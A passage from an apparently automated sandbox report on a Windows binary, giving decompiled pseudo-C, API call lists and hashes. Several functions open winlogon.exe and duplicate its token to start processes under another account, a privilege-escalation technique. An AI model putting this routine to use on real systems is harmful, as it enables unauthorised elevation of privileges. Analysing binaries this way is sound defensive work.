                                                                                                                					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
                                                                                                                					EndDeferWindowPos(_v8);
                                                                                                                					InvalidateRect( *(_t96 + 0x10), _t96, 1);
                                                                                                                					_t95 = _v12;
                                                                                                                				}
                                                                                                                				return E00402CED(_t95, _a4, _a8, _a12);
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040421E
                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                                                • DragFinish.SHELL32(?), ref: 0040423F
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                  • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                  • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                                                • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                                                • String ID: $
                                                                                                                • API String ID: 2142561256-3993045852
                                                                                                                • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                                                • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 55%
                                                                                                                			E00405B81(signed short __ebx) {
                                                                                                                				signed int _t21;
                                                                                                                				void* _t22;
                                                                                                                				struct HINSTANCE__* _t25;
                                                                                                                				signed int _t27;
                                                                                                                				void* _t35;
                                                                                                                				signed short _t39;
                                                                                                                				signed int _t40;
                                                                                                                				void* _t57;
                                                                                                                				int _t61;
                                                                                                                				void* _t62;
                                                                                                                				int _t71;
                                                                                                                
                                                                                                                				_t39 = __ebx;
                                                                                                                				if( *0x41c470 == 0) {
                                                                                                                					E00405ADF();
                                                                                                                				}
                                                                                                                				_t40 =  *0x41c468;
                                                                                                                				_t21 = 0;
                                                                                                                				if(_t40 <= 0) {
                                                                                                                					L5:
                                                                                                                					_t57 = 0;
                                                                                                                				} else {
                                                                                                                					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
                                                                                                                						_t21 = _t21 + 1;
                                                                                                                						if(_t21 < _t40) {
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							goto L5;
                                                                                                                						}
                                                                                                                						goto L6;
                                                                                                                					}
                                                                                                                					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
                                                                                                                				}
                                                                                                                				L6:
                                                                                                                				if(_t57 != 0) {
                                                                                                                					L21:
                                                                                                                					_t22 = _t57;
                                                                                                                				} else {
                                                                                                                					if((_t39 & 0x00010000) == 0) {
                                                                                                                						if( *0x40fb90 == 0) {
                                                                                                                							_push( *0x41c478 - 1);
                                                                                                                							_push( *0x41c45c);
                                                                                                                							_push(_t39);
                                                                                                                							_t25 = E00405CE7();
                                                                                                                							goto L15;
                                                                                                                						} else {
                                                                                                                							wcscpy(0x40fda0, L"strings");
                                                                                                                							_t35 = E00405EDD(_t39,  *0x41c45c);
                                                                                                                							_t62 = _t62 + 0x10;
                                                                                                                							if(_t35 == 0) {
                                                                                                                								L13:
                                                                                                                								_t25 = GetModuleHandleW(0);
                                                                                                                								_push( *0x41c478 - 1);
                                                                                                                								_push( *0x41c45c);
                                                                                                                								_push(_t39);
                                                                                                                								goto L15;
                                                                                                                							} else {
                                                                                                                								_t61 = wcslen( *0x41c45c);
                                                                                                                								if(_t61 == 0) {
                                                                                                                									goto L13;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t25 = GetModuleHandleW(_t57);
                                                                                                                						_push( *0x41c478 - 1);
                                                                                                                						_push( *0x41c45c);
                                                                                                                						_push(_t39 & 0x0000ffff);
                                                                                                                						L15:
                                                                                                                						_t61 = LoadStringW(_t25, ??, ??, ??);
                                                                                                                						_t71 = _t61;
                                                                                                                					}
                                                                                                                					if(_t71 <= 0) {
                                                                                                                						L20:
                                                                                                                						_t22 = 0x40c4e8;
                                                                                                                					} else {
                                                                                                                						_t27 =  *0x41c46c;
                                                                                                                						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
                                                                                                                							goto L20;
                                                                                                                						} else {
                                                                                                                							_t57 =  *0x41c458 + _t27 * 2;
                                                                                                                							_t14 = _t61 + 2; // 0x2
                                                                                                                							memcpy(_t57,  *0x41c45c, _t61 + _t14);
                                                                                                                							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
                                                                                                                							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
                                                                                                                							 *0x41c468 =  *0x41c468 + 1;
                                                                                                                							 *0x41c46c =  *0x41c46c + _t61 + 1;
                                                                                                                							if(_t57 != 0) {
                                                                                                                								goto L21;
                                                                                                                							} else {
                                                                                                                								goto L20;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t22;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                • wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                                                  • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                                                • wcslen.MSVCRT ref: 00405C20
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                • memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                • String ID: strings
                                                                                                                • API String ID: 3166385802-3030018805
                                                                                                                • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                                                • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
                                                                                                                				char _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* __esi;
                                                                                                                				void* _t18;
                                                                                                                				intOrPtr* _t22;
                                                                                                                				void* _t23;
                                                                                                                				void* _t28;
                                                                                                                				int _t37;
                                                                                                                				intOrPtr* _t39;
                                                                                                                				intOrPtr* _t40;
                                                                                                                
                                                                                                                				_v8 = 0;
                                                                                                                				_t18 = OpenProcess(0x2000000, 0, _a8);
                                                                                                                				_v12 = _t18;
                                                                                                                				if(_t18 == 0) {
                                                                                                                					_t37 = GetLastError();
                                                                                                                				} else {
                                                                                                                					_t39 = _a4 + 0x800;
                                                                                                                					_a8 = 0;
                                                                                                                					E0040289F(_t39);
                                                                                                                					_t22 =  *((intOrPtr*)(_t39 + 4));
                                                                                                                					if(_t22 == 0) {
                                                                                                                						_t23 = 0;
                                                                                                                					} else {
                                                                                                                						_t23 =  *_t22(_v12, 2,  &_a8);
                                                                                                                					}
                                                                                                                					if(_t23 == 0) {
                                                                                                                						_t37 = GetLastError();
                                                                                                                					} else {
                                                                                                                						_a4 = _a8;
                                                                                                                						E0040289F(_t39);
                                                                                                                						_t40 =  *((intOrPtr*)(_t39 + 8));
                                                                                                                						if(_t40 == 0) {
                                                                                                                							_t28 = 0;
                                                                                                                						} else {
                                                                                                                							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
                                                                                                                						}
                                                                                                                						if(_t28 == 0) {
                                                                                                                							_t37 = GetLastError();
                                                                                                                						} else {
                                                                                                                							 *_a12 = _v8;
                                                                                                                							_t37 = 0;
                                                                                                                						}
                                                                                                                						CloseHandle(_a8);
                                                                                                                					}
                                                                                                                					CloseHandle(_v12);
                                                                                                                				}
                                                                                                                				return _t37;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                                  • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                                • String ID: winlogon.exe
                                                                                                                • API String ID: 1315556178-961692650
                                                                                                                • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                                • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00405236(short* __ebx, intOrPtr _a4) {
                                                                                                                				int _v8;
                                                                                                                				char _v12;
                                                                                                                				void _v2058;
                                                                                                                				void _v2060;
                                                                                                                				int _t35;
                                                                                                                				int _t41;
                                                                                                                				signed int _t48;
                                                                                                                				signed int _t49;
                                                                                                                				signed short* _t50;
                                                                                                                				void** _t52;
                                                                                                                				void* _t53;
                                                                                                                				void* _t54;
                                                                                                                
                                                                                                                				_t48 = 0;
                                                                                                                				_v2060 = 0;
                                                                                                                				memset( &_v2058, 0, 0x7fe);
                                                                                                                				_t54 = _t53 + 0xc;
                                                                                                                				 *__ebx = 0;
                                                                                                                				_t52 = _a4 + 4;
                                                                                                                				_v12 = 2;
                                                                                                                				do {
                                                                                                                					_push( *_t52);
                                                                                                                					_t6 = _t52 - 4; // 0xe80040cb
                                                                                                                					_push( *_t6);
                                                                                                                					_push(L"%s (%s)");
                                                                                                                					_push(0x400);
                                                                                                                					_push( &_v2060);
                                                                                                                					L0040B1EC();
                                                                                                                					_t35 = wcslen( &_v2060);
                                                                                                                					_v8 = _t35;
                                                                                                                					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
                                                                                                                					_t49 = _t48 + _v8 + 1;
                                                                                                                					_t41 = wcslen( *_t52);
                                                                                                                					_v8 = _t41;
                                                                                                                					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
                                                                                                                					_t54 = _t54 + 0x34;
                                                                                                                					_t52 =  &(_t52[2]);
                                                                                                                					_t23 =  &_v12;
                                                                                                                					 *_t23 = _v12 - 1;
                                                                                                                					_t48 = _t49 + _v8 + 1;
                                                                                                                				} while ( *_t23 != 0);
                                                                                                                				_t50 = __ebx + _t48 * 2;
                                                                                                                				 *_t50 =  *_t50 & 0x00000000;
                                                                                                                				_t50[1] = _t50[1] & 0x00000000;
                                                                                                                				return __ebx;
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                • String ID: %s (%s)
                                                                                                                • API String ID: 3979103747-1363028141
                                                                                                                • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                                • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 78%
                                                                                                                			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                				void _v514;
                                                                                                                				short _v516;
                                                                                                                				void _v8710;
                                                                                                                				short _v8712;
                                                                                                                				int _t17;
                                                                                                                				WCHAR* _t26;
                                                                                                                
                                                                                                                				E0040B550(0x2204, __ecx);
                                                                                                                				_v8712 = 0;
                                                                                                                				memset( &_v8710, 0, 0x2000);
                                                                                                                				_t17 = GetDlgCtrlID(_a4);
                                                                                                                				_t34 = _t17;
                                                                                                                				GetWindowTextW(_a4,  &_v8712, 0x1000);
                                                                                                                				if(_t17 > 0 && _v8712 != 0) {
                                                                                                                					_v516 = 0;
                                                                                                                					memset( &_v514, 0, 0x1fe);
                                                                                                                					GetClassNameW(_a4,  &_v516, 0xff);
                                                                                                                					_t26 =  &_v516;
                                                                                                                					_push(L"sysdatetimepick32");
                                                                                                                					_push(_t26);
                                                                                                                					L0040B278();
                                                                                                                					if(_t26 != 0) {
                                                                                                                						E00406025(_t34,  &_v8712);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return 1;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                • String ID: sysdatetimepick32
                                                                                                                • API String ID: 1028950076-4169760276
                                                                                                                • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                                                • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E00404706(long __edi, wchar_t* _a4) {
                                                                                                                				short _v8;
                                                                                                                				void* _t8;
                                                                                                                				void* _t10;
                                                                                                                				long _t14;
                                                                                                                				long _t24;
                                                                                                                
                                                                                                                				_t24 = __edi;
                                                                                                                				_t8 = 0;
                                                                                                                				_t14 = 0x1100;
                                                                                                                				if(__edi - 0x834 <= 0x383) {
                                                                                                                					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
                                                                                                                					if(0 != 0) {
                                                                                                                						_t14 = 0x1900;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
                                                                                                                					_t10 = wcscpy(_a4, 0x40c4e8);
                                                                                                                				} else {
                                                                                                                					if(wcslen(_v8) < 0x400) {
                                                                                                                						wcscpy(_a4, _v8);
                                                                                                                					}
                                                                                                                					_t10 = LocalFree(_v8);
                                                                                                                				}
                                                                                                                				return _t10;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                                                • wcslen.MSVCRT ref: 00404756
                                                                                                                • wcscpy.MSVCRT ref: 00404766
                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                                                • wcscpy.MSVCRT ref: 00404780
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                • String ID: netmsg.dll
                                                                                                                • API String ID: 2767993716-3706735626
                                                                                                                • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                                                • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                				intOrPtr _v12;
                                                                                                                				void* _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				char _v32;
                                                                                                                				char _v72;
                                                                                                                				void _v582;
                                                                                                                				long _v584;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr _t27;
                                                                                                                				wchar_t* _t34;
                                                                                                                				wchar_t* _t42;
                                                                                                                				long* _t43;
                                                                                                                				int _t44;
                                                                                                                				void* _t52;
                                                                                                                				void* _t54;
                                                                                                                				long _t56;
                                                                                                                				long* _t57;
                                                                                                                				void* _t60;
                                                                                                                
                                                                                                                				_t60 = __eflags;
                                                                                                                				_t52 = __edx;
                                                                                                                				E004095AB( &_v72);
                                                                                                                				_v584 = 0;
                                                                                                                				memset( &_v582, 0, 0x1fe);
                                                                                                                				E004095FD(_t52, _t60,  &_v72);
                                                                                                                				_t27 = 0;
                                                                                                                				_v12 = 0;
                                                                                                                				if(_v20 <= 0) {
                                                                                                                					L10:
                                                                                                                					_t56 = 0;
                                                                                                                				} else {
                                                                                                                					do {
                                                                                                                						_t57 = E00405A92(_t27,  &_v32);
                                                                                                                						if(E00409A94( *_t57,  &_v584) == 0) {
                                                                                                                							goto L9;
                                                                                                                						} else {
                                                                                                                							_t34 =  &_v584;
                                                                                                                							_push(_t34);
                                                                                                                							_push(_a4);
                                                                                                                							L0040B278();
                                                                                                                							if(_t34 == 0) {
                                                                                                                								L5:
                                                                                                                								_t44 = 0;
                                                                                                                								_t54 = OpenProcess(0x2000000, 0,  *_t57);
                                                                                                                								if(_t54 == 0) {
                                                                                                                									goto L9;
                                                                                                                								} else {
                                                                                                                									_v16 = _v16 & 0;
                                                                                                                									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
                                                                                                                										_t44 = 1;
                                                                                                                										CloseHandle(_v16);
                                                                                                                									}
                                                                                                                									CloseHandle(_t54);
                                                                                                                									if(_t44 != 0) {
                                                                                                                										_t56 =  *_t57;
                                                                                                                									} else {
                                                                                                                										goto L9;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_t42 = wcschr( &_v584, 0x5c);
                                                                                                                								if(_t42 == 0) {
                                                                                                                									goto L9;
                                                                                                                								} else {
                                                                                                                									_t43 =  &(_t42[0]);
                                                                                                                									_push(_t43);
                                                                                                                									_push(_a4);
                                                                                                                									L0040B278();
                                                                                                                									if(_t43 != 0) {
                                                                                                                										goto L9;
                                                                                                                									} else {
                                                                                                                										goto L5;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L12;
                                                                                                                						L9:
                                                                                                                						_t27 = _v12 + 1;
                                                                                                                						_v12 = _t27;
                                                                                                                					} while (_t27 < _v20);
                                                                                                                					goto L10;
                                                                                                                				}
                                                                                                                				L12:
                                                                                                                				E004095DA( &_v72);
                                                                                                                				return _t56;
                                                                                                                			}






















                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004059B5
                                                                                                                  • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                                  • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                                                  • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                  • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                  • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                                                  • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                                                  • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                  • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                  • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                • _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                • wcschr.MSVCRT ref: 00405A0E
                                                                                                                • _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                                                • String ID:
                                                                                                                • API String ID: 768606695-0
                                                                                                                • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                                                • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				void _v68;
                                                                                                                				char _v108;
                                                                                                                				void _v160;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t55;
                                                                                                                				void* _t57;
                                                                                                                				wchar_t* _t67;
                                                                                                                				intOrPtr* _t73;
                                                                                                                				signed int _t74;
                                                                                                                				signed int _t86;
                                                                                                                				signed int _t95;
                                                                                                                				intOrPtr* _t98;
                                                                                                                				void* _t100;
                                                                                                                				void* _t102;
                                                                                                                
                                                                                                                				_t73 = __ebx;
                                                                                                                				_t74 = 0xd;
                                                                                                                				_push(9);
                                                                                                                				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
                                                                                                                				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
                                                                                                                				_t102 = _t100 + 0x18;
                                                                                                                				asm("movsw");
                                                                                                                				E00407343(__ebx, _a4, L"<tr>");
                                                                                                                				_t95 = 0;
